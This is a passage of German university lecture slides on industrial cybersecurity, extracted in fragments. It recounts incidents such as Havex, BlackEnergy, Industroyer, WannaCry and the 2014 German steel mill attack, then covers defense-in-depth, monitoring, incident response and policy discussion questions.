riebetr

iebe

OT

IT

Zeit

Deutsch

es S

tahlw

erk

(Sab

otage

)

(2014)

Deutsch

es S

tahlw

erk

(Sab

otage

)

(2014)

DRAGONFLY / HAVEX RAT

44

Die Dragonfly Kampagne verwendete das HAVEX Remote Access Tool (HAVEX RAT)

Ca. 2000 Anlagen infiziert

Hauptsächlich Anlagen aus dem Bereich PT&D und Petrochemie

Angriff hatte „nur“ Spionage als Ziel Keine Unterbrechung der Produktion

Verwendung von OPC um Industrieanlagen auszuhorchen und zu kartografieren

Möglichkeit weitere Module und Funktionennachzuladen

Verbreitung über verschiedene Wege:

Spam Mails (Spear Phishing)

Watering Hole Attack: Austausch der Gerätesoftwareauf Webseiten der Hersteller

Hersteller in De, Fr und Ru betroffen

Remote Management Software

Kamera-Software (Mesa Imaging)

ICS Applikationen https://www.netresec.com/?page=Blog&month=2014-11&post=Observing-the-Havex-RAT

Hersteller-Server

SW Downloads)

OPC Server in Anlage

Integrator /

Wartung:

SW Update

???

BLACKENERGY 2

45

Blackenergy 2: Angriffe auf Industrieanlagen

Primärer Fokus: HMI

Siemens SIMATIC

GE SIMPLICITY

Advantech WebAccess

Angriff gegen HMI Systeme die mit dem Internet verbunden waren

Vorteil von Angriff auf HMI:

Parameter können verändert werden

Tatsächlicher Zustand der Anlage kann verschleiert werden

Angreifer hat direkte Kontrolle über Internet-Verbindung

SCADA Interface einer Pumpensteuerung (bei shodan.io gefunden)

Originaler BlackEnergy Builder von 2007, Quelle: F-Secure.com

BLACKENERGY 3 UND KIEW BLACKOUT 2015

46

Blackenergy 3 enthält keinen Schadcode der direkt Industrieanlagen angreift

Angriff über Büro Netzwerke der Energieversorger

Eindringen über Verbindungen zwischen Büro- und Produktionsnetzwerk

Zerstörung von PC Systemen in den Anlagen durch KillDisk Malware

Zerstörung von Seriell-zu-Ethernet Konvertern durch fehlerhafte Firmware

Im Dezember 2015 wurden 225.000 Haushalte durch Blackenergy 3 vom Strom abgeschnitten

Der Energieversorger benötigte 6 Stunden um die Anlagen wieder von Hand anzufahren

In manchen Anlagen musste bis zu einem Jahr ein Handbetrieb gefahren werden

Volle Automatisierung wurde erst nach einem Jahr wiederhergestellt

Umspannwerk, Quelle: Wikimedia[1]

STROMAUSFALL IN DER UKRAINE (23.12.2015):

47

E-Mails an Mitarbeiter des

Energieversorgers, mit der Werchowna

Rada als vermeintlichem Absender, dem ukrainischen Parlament.

Anhang: eine Word-Datei; Beim Öffnen

erschien die Meldung, die Word-Version sei veraltet, zum Aktualisieren müsse ein Makro

ausgeführt werden.

Makro installiert Black Energy 3

Malware. Anlage wird über

Büro Netz infiziert und gestört.

Hallo, hier

Parlament!

!!Zu alt!

Bitte

aktualisieren!

CRASHOVERRIDE / INDUSTROYER

48

Malware die spezifisch auf Industrieanlagen zugeschnitten ist

Ist in der Lage Schaltkreisunterbrecher in Umspannwerken und Kraftwerken zu manipulieren

Ziele in den Bereichen Energie-, Wasserversorgung und Verkehrssteuerung

Erfolgreicher Angriff (Test?) verursachten einen großflächigen Stromausfall für 75 Minuten in Kiew/Ukraine am 17. Dezember 2016

Siemens SIPROTEC Unterbrecher

Anonyme Kommunikation über TOR Netzwerk

Angriff auf Los Angeles Verkehrssteuerungssystem verursachte Staus

Adaptive Malware mit vielen Erweiterungen für Protokolle in Industrieanlagen

IEC 104, IEC 101, IEC 61850, OPC DA

Kraftwerk, Quelle:

Wikimedia

INDUSTROYER / CRASHOVERRIDE MALWARE

MAIN-BACKDOOR

Zusätzliches

Backdoor

Zusätzliche

ToolsMain-

Backdoor

Launcher

Data Wiper

101 Payload 104 Payload 61850 Payload OPC DA Payload

installiert kontrolliert

installiert

führt aus

führt aus

49Autor: Patrick Reck (HS-Albsig)

Einsatzbereit, falls die

Main-Backdoor

entdeckt wurde

Löscht Registry-Schlüssel, überschreibt

Dateien, verwischt Spuren der Angreifer

führt aus

Überwacht

und

kontrolliert

elektrische

Systeme

Kann von den

Angreifern

stark

angepasst/konfi

guriert werden

Erzeugt eine

Liste aller

relevanten

Geräte des

Systems

Ermöglicht

den Austausch

und

Veränderung

der im System

vorhandenen

Komponenten

WANNACRY / WANNACRYPTOR

50

Ransomware Wannacry

Infektion von ungeschütztenWindows Systemen (bisWindows 7) weltweit

Große Schäden in Industrie-Anlagen, Transportwesen,etc.

Malware dringt in Intranetder Firma ein und verbreitetsich von dort aus aufSysteme die nicht aus demInternet erreichbar sind

Spezialsysteme (Kassensysteme,Geldautomaten, Anzeigen, …)aufgrund schlechtem Patch-Standbesonders betroffen

Nettes Detail: Der Angriff stammt aus demArsenal der amerikanischen Geheimdiensteund wurde 5 Jahre lang unbemerkt genutzt

Ca. 3000 Infektionen vonIndustrie-Anlagen mitgewöhnlicher Malwarejährlich (https://dragos.com/blog/mimics/)

Anzeigetafeln bei der Deutschen Bahn:

Geldautomaten in China:

WANNA CRY - ÜBERSICHT

51

Hintergrund:

Veröffentlichungen auf Wiki Leaks über Schwachstellen im

Windows Betriebssystem namens Eternalromance, -blue, -

synergy.

Höchst wahrscheinlich wurde Microsoft von der CIA über

entwendete Zero Day Exploits gewarnt.

12. März 12. Mai14. April 13.Mai

▪ Microsoft stellt

vorsorglich einen

Sicherheitspatch für

unterstützte

Systeme zur

Verfügung

▪ Veröffentlichung

detaillierter Exploit

Anleitungen

▪ Experten warnen

vor einem baldigem

großangelegtem

Angriff

▪ Erste Maleware unter

Verwendung der

veröffentlichten

Schwachstelle

Eternalblue infiziert

ein Krankenhaus in

Großbritanien,

ihr Name WannaCry

▪ Ein entdeckter

,,Kill-switch‘‘

stoppte weitere

Verbreitung in

Netzwerken

▪ Microsoft verteilt

nachträglich

kostenlose Updates

für XP

Quelle: Heise-Security[1]

Autor: Daniel Grimm (HS-Albsig)

AUSWIRKUNGEN VON WANNACRY

52

147 Varianten von WannaCry wurden gefunden (Quelle: AV Test)

Schaden geht in die Milliarden

Krankenhäuser in GB mussten Betrieb einschränken

Ausfall der Fahrkartenautomaten und Anzeigetafeln der DB

Innenministerium in Russland meldete 1.000 infizierte Rechner

Renault stoppt Produktion in einigen Werken

Nissan Werk Sunderland wurde infiziert

Tankstellen und Geldautomaten in China konnten keine Transaktionen durchführen

Telefónica, FedEx, Stahlkonzern Sandvik und viele weitere Betriebe betroffen

Nur ca. 30.000 EUR Lösegeld erzielt

War das Ziel wirklich das Lösegeld?

DEUTSCHES STAHLWERK 2014

53

Erwähnung in BSI Lagebericht 2014

Um welches Stahlwerk es sich handelt, wird nicht

genannt.

Der Vorfall blieb zunächst komplett geheim.

Er wurde erst mit dem Lagebericht 2014 des

Bundesamts für Sicherheit in der Informationstechnik

bekannt.

Der Angriff führte dazu, dass ein Hochofen nicht

mehr kontrolliert heruntergefahren werden konnte

Die gesamte Anlage wurde schwer beschädigt

Die genauen Schäden und Einzelheiten des Vorfalls

wurden nicht veröffentlicht

Hochofen, Quelle: Wikipedia

VORGEHENSWEISE DER ANGREIFER (LAUT BSI)

Erstellung einer gefälschten

Webseite mit Login Feldern

Mail an Service-Firma, mit dem

Link zur gefälschten Webseite

Erhalt der Zugangsdaten des

Service-Technikers

Zugriff auf das Stahlwerk mit den

Anmeldedaten des

Servicetechnikers

Autor: Simon Luib (HS-Albsig)

Hierbei wird

angegeben, man sei

Kunde der Servicefirma

und die Anlage habe ein

Problem

Der Techniker wird

auf die original Seite

umgeleitet, um

keinen Verdacht zu

schöpfen

54

Secure

Stahl

Benutzername

******* Hilfe

Problem!

Secure

Stahl

Max Muster_

Sunshine

!!

… UND MIT INDUSTRIE 4.0?

55

Kundenspezifische Produktion:

Kunden können ihre eigenen Kekse bestellen?

Wandelbare Produktion:

Neue Zusammenstellung von Maschinen und Abläufen

Stichwort Plug & Produce

Wertschöpfungsnetzwerke

Engere operative Zulieferer – Produzenten-Beziehungen

Kommunikation über Unternehmensgrenzen

Kommunikation über Standortgrenzen

Dienstleister in der Fertigung

Firma A

Firma BFirma C

++

…UND WIE IST DAS MIT INDUSTRIE 4.0?

TSN(IEEE Echtzeit

Ethernet)

Internet

Pub/Sub

OPC-UA

MES

ERP

SCADA

SPS

Feldgeräte

Automatisierungspyramide Industrie 4.0 Kommunikation

Cloud

Partner

Local

Cloud

Unternehmensebene

Betriebsleitebene

Prozessleitebene

Steuerungsebene

Feldebene

Gefahren

EVOLUTION UND VERFEINERUNG DER ANGRIFFSWERKZEUGE

57

Zeit…. 1990 1995 2000 2005 2010 2015 Heute

Ars

enal

der

Angr

eifer

/

Vie

lfal

t der

Angr

iffe

/

Notw

endig

e V

ert

eid

igung

TYPISCHE ANGRIFFSWEGE IN EINER INDUSTRIE-ANLAGE

58

Internet

Feldebene

Kontroll LAN

Infizierter

Laptop

Fehlende Zonierung

Fehlende Zonierung /

Fehlende ACLs /

Fehlende NAC

Unzureichende

Isolation

drahtloser

Netzwerke

Schatten IT /

schlecht

gesicherte

Modems /

WLANs

Fehlende Zonierung

Infizierter

Rechner

Infizierte USB

Sticks

Fehlende NAC

Unauthorisierte

Verbindungen

Ungeschützte

Netzwerk

Laufwerke

(z.B. mit Software /

Updates)

Watering hole Attack

Fabrik

Netz

3rd

Party

3rd Party

Probleme

Office

LAN

Infizierter

Remote

Access

Unverschlüsselte

Kommunikation

zwischen OPC

Server/Client

Fehlende Benutzer-

Authentifizierung

ENTWERFEN SIE EIN HORROR SZENARIO FÜR

DEUTSCHLAND!

59Photo credit: chiaralily on VisualHunt / CC BY-NC

Was kann passieren?

Entwerfen Sie ein Horror-

Szenario für ein Unternehmen

oder für ganz Deutschland!

WAS KANN PASSIEREN?

60

Eine beunruhigende Abschätzung

Studie des TAB (Büro für Technikfolgenabschätzung)

Lesenswert: Buch Blackout, Marc Elsberg

Verkehr und Transport

Versagen der Versorgung mit Benzin

Privater und öffentlicher Verkehr kommt zum Erliegen

Verkehrssteuerung funktioniert nicht

Versorgung der Bürger

Zusammenbruch der Lieferketten, Verderbliche Güter verderben

Mangelnder Transport (Schiffe, LKW, …)

Wasserversorgung und Entsorgung bricht zusammen

Nachschub an Medikamenten nicht gesichert

Krankenhäuser und Heime müssen Betrieb einstellen

Heizung funktioniert nicht

Wirtschaft und Finanzen

Firmen können nicht operieren und gehen pleite

Nutztieren (z.B. Kühe) sterben aufgrund fehlender Automatisierung

Geld wird knapp und verliert Bedeutung – Markt versagt

Kommunikation

Informationsfluss zu Bürgern versiegt

Irrationales Verhalten der Bürger

https://www.tab-beim-bundestag.de/de/pdf/publikationen/berichte/TAB-Arbeitsbericht-ab141.pdf

DIE WELT IST SCHLECHT UND

UNSICHER – UND JETZT?VERTEIDIGUNG IST DIE BESTE VERTEIDIGUNG!

Photo credit: arkad83 on Visualhunt.com / CC BY

WIE MACHT MAN COMPUTER, NETZWERKE UND

FIRMEN SICHER?

Verschiedene Sicherheitsmaßnahmen wirken auf unterschiedliche

Art und Weise:

Präventiv:

Gute Passwörter, aktuelle Software, Anti-Virus, Schulungen, …

Detektierend

Intrusion Detection System, Systemüberwachung, Kontrolle

Reaktiv

Incident Response Team, Anti-Virus, Intrusion Prevention System

62Photos on Visualhunt https://visualhunt.com/re/d04967 , DocChewbacca on Visualhunt / CC BY-NC-SA,

Jay Phagan on VisualHunt.com / CC BY

NACHHALTIGE SICHERHEIT PDCA (THEORIE)

63

PLAN

DO

CHECK

ACT

NACHHALTIGE SICHERHEIT PDCA (REALITÄT)

64

PLAN(something)

DO

(little)

CHECK(nothing)

ACT

(never / too late)

IT SECURITY IST VIELFÄLTIG

65

Systemsicherheit

Sicherheitsmaßnahmen von Computersystemen richtig verstehen und anwenden

Computer sicher konfigurieren und einsetzen

Netzwerksicherheit

Sichere Kommunikationsnetzwerke entwerfen

(Sichere) Kommunikationsprotokolle verstehen und richtig verwenden

Offensive Sicherheit

Hacken, um Hacker zu verstehen

Sicherheit bestehender Systeme prüfen

Sicherheitsorganisation / Sicherheitsmanagement

Sicherheit in ein ganzes Unternehmen bekommen

Faktor Mensch bei der Sicherheit einbeziehen

66

PRÄVENTIVE

SICHERHEITSMASSNAHMENVERHINDERN VON ANGRIFFEN

SICHERHEIT AM BEISPIEL BURG

67

2er Gruppen mit ihrem Nachbarn. Sammlung im Plenum.

Dies ist Ihre Burg! Gestalten Sie ein Sicherheitskonzept! Sie sind die

Experten

Welche Sicherheitsmaßnahmen planen Sie? Wie passen diese zusammen?

Hauptburg Burghausen, Bayern; Quelle: Wikimedia

WIE ENTWIRFT MAN EINE GUTE BURG?

Kombination verschiedenerunabhängiger Sicherheits-mechanismen

Ein Angreifer muss mehrere/alle Mechanismen überwinden

Ein Fehler in einem Mechanismus gefährdet nicht das Gesamtsystem

Unterteilung eines Systems in voneinander getrennte Bereiche

Angreifer kann sich nach Eindringen in einen Bereich nicht frei bewegen

DEFENSE-IN-DEPTH IN EINEM IT NETZWERK

69

Der Angreifer muss mehrere

unabhängigeVerteidigungs-

mechanismen umgehen

Die Überwindung eines einzigen

Mechanismus führt nicht zum Ziel

In der IT Security: Kombination von

Mechanismen aus den Bereichen

Netzwerksicherheit und

Systemsicherheit

Abbildung rechts zeigt ein Beispiel

für die Umsetzung einer DiD

Strategie

Outer Firewall

Inner Firewall

Personal Firewall

Virus Protection

Application

Whitelisting

Intrusion

Detection

System

Updates/

Patches

Internet

Victim

Application

DMZ

Intranet

Close Vuln’s

Detect Attacks

DiD Implementierung in

einem Beispielnetzwerk

70

DETEKTIERENDE

SICHERHEITSMASSNAHMENERKENNUNG VON ANGRIFFEN

Photo on https://visualhunt.com/re/d04967 VisualHunt.com

REICHT DAS? NEIN! SECURITY MONITORING

• IT Systeme sind komplex und

beinhalten viele Einzelkomponenten

• Ohne zentrale Erfassung von

Ereignissen und Systemzuständen

können Abweichungen vom Soll-

Zustand und Angriffe nicht erkannt

werden

• Reaktive Maßnahmen können erst

sehr spät (oder eben zu spät) wirken

99 Tagelang wurden Angriffe in einem

kompromittierten System im

Durchschnitt nicht entdeckt.(Studie FireEye, 2016 – M-Trends 2017)

47% der kompromittierten Firmen waren

nicht in der Lage die Angriffe zu

entdecken sondern mussten zuerst

von Dritten auf die Angriffe

hingewiesen werden.(Studie FireEye, 2016 – M-Trends 2017)

HIGH INTERACTION HONEYPOT

72

Virtueller High-Interaction Honeypot / Honeynet an unserer Hochschule

Von Studenten im Projektstudium aufgesetzt

Go-live im internen Testbetrieb: April 2017

… mal schauen was daraus wird!

Eingesetzte Software:

VirtualBox zur Virtualisierung

Security Onion als Honeywall

Windows und Linux Systeme

Apache Webserver

MySQL Datenbank

Eigene Web-Applikation + z.T. Logverwaltung

Verwundbare Web-Applikation des Hochschul-Honeynets

… NACH WENIGEN MINUTEN

73

HONEYNET AUFBAU

74

75

REAKTIVE SICHERHEITSMASSNAHMENWIEDERHERSTELLUNG DES SICHEREN URSPRUNGSZUSTANDS

REAKTION – INCIDENT RESPONSE / FORENSIK

Erkennung mit welchen Teilen des

Systems ein Angreifer interagiert hat

Veränderungen erkennen und weitere

Veränderungen und Datenabfluss

unterbinden

Schließen der Sicherheitslücken, die

zum Angriff geführt haben

Incident Response

Reaktion auf einen Eindringling

IT-Forensik

Sichern von Beweisen (ggf. gerichtsfest)

76

BSI Lagezentrum. Quelle: BSI

Quelle: BSI

WIEDERHERSTELLEN DES URSPRUNGSZUSTANDS

77

Erneutes Aufsetzen von Systemen

Wiedereinspielen von Backups

Voraussetzung: regelmäßige, vollständige, lang verfügbare

Backups

Schwer vereinbare Voraussetzungen:

Vollständige Backups Viel Speicher

Aktuelle Backups Viele Backups mit viel Speicher

Lange verfügbare Backups Viele Backups die lange viel

Speicher belegen

Clevere Methoden zur effizienten Sicherung und

Wiederherstellung von Daten!

Bandlaufwerke und Tapes:

Tape-Bibliothek:

Bildquelle:Wikimedia

WAS MUSS SICH ÄNDERN?

78

Technik muss anders gedacht werden

Security nicht als Add-On

Secure by Default

Menschen müssen bereit sein für Security Geld auszugeben

Keine alles-umsonst Mentalität bei Security

Selbstschutz kostet etwas

Firmen müssen mehr Verantwortung übernehmen

Haftung bei schwerwiegenden Versäumnissen

Pflicht zur sicheren Entwicklung

Staatliche Vorgaben und Unterstützung

Beratung der Bürger

Security in der Schule

Gesetze und Verordnungen zur Umsetzung von Sicherheit wenn der Markt das nicht tut

Neue Ausbildungsinhalte

IT Sicherheit und Prozesse

Netzwerke, Netzwerksicherheit

Betriebssysteme, Systemsicherheit

Offensive Sicherheit

Forensik

Kryptografie

Neue Berufsbilder:

Security Analyst

IT Security Officer (ISO)

Security Engineer (Entwickler)

Security - Auditor

Penetrationstester

DISKUSSIONSBEREICHE

79

Bürger

(Individuum)

Staat

(Legislative)- Gesetze

- Verordnungen

Staat

(Exekutive)- Polizei

- Kontrolle

Firmen-Produkte

-Produkt-

entwicklung

- Support

- Kommunikation

Internet

Provider- Filter

- Zentrale Technik

- Überwachung?

Cybercrime

Photo on https://visualhunt.com/re/18f472 VisualHunt

FRAGESTELLUNGEN

80

Welche Rolle sollten die einzelnen Akteure in der Bekämpfung und Vermeidung der

Cyber-Kriminalität und von Cyber-Angriffen spielen?

Welche Untergrenzen (muss gemacht werden) und welche roten Linien (kann nicht

mehr erwartet werden, darf nicht gemacht werden) gibt es?

Wer sollte Verantwortung bei einem Cyber-Zwischenfall tragen? Wer trägt

Verantwortung bei einer „normalen“ Straftat?

Was ist im Kampf gegen Cybercrime rechtlich und ethisch vertretbar? Wie sehen

ethische Grenzen aus? Wann sollten/können Ethische Grenzen verletzt werden?

Welche Auswirkungen haben Cybersecurity-Maßnahmen:

Auf die Benutzbarkeit von Produkten?

Auf die Preise von Produkten?

Auf die Wettbewerbsfähigkeit von Firmen?

Auf die Innovationsfähigkeit von Firmen?

MALWARE IM DARKNET

81

Ist freie Kommunikation im Internet ein Nachteil bei der Bekämpfung von

Cybercrime?

Welche Vor-Nachteile bietet das Darknet für Aktivisten aber auch Cyber-Kriminelle?

Kann und sollte man das Darknet stärker regulieren?

Sollte man es verbieten?

AUFKLÄRUNG DURCH DIE POLIZEI?

82

Was darf die Polizei?

Was darf sie nicht?

Wie sollte man Privatsphäre und freie Meinungsäußerung gegen Cybersicherheit

gewichten?

Kann man Maßnahmen gegen Kriminelle und Maßnahmen gegen Bürger voneinander

trennen? Wo geht das? Wo geht das nicht?

CYBERWAR UND KRIEG

83

Photo credit:The U.S. ArmyonVisual Hunt/CC BY

ZUSAMMENFASSEND: DIE SACHE MIT DER IT SICHERHEIT

84

IT Security ist ein Katz- und Maus- Spiel zwischen Angreifern und Verteidigern

Neue Angriffe Neue Verteidigung Neue Angriffe

Die Ausgangslage ist nicht besonders günstig

Verteidigung: alle Teile eines Systems müssen zu jeder Zeit sicher sein

Angriff: es genügt wenn ein Teil eines Systems momentan unsicher ist

Es gibt keine Wunderwaffen in der IT Sicherheit

Mitdenken ist gefragt!

Was ist das Allerwichtigste wenn man

sein Rad vor Diebstahl schützen will?

Gesunder Menschenverstand!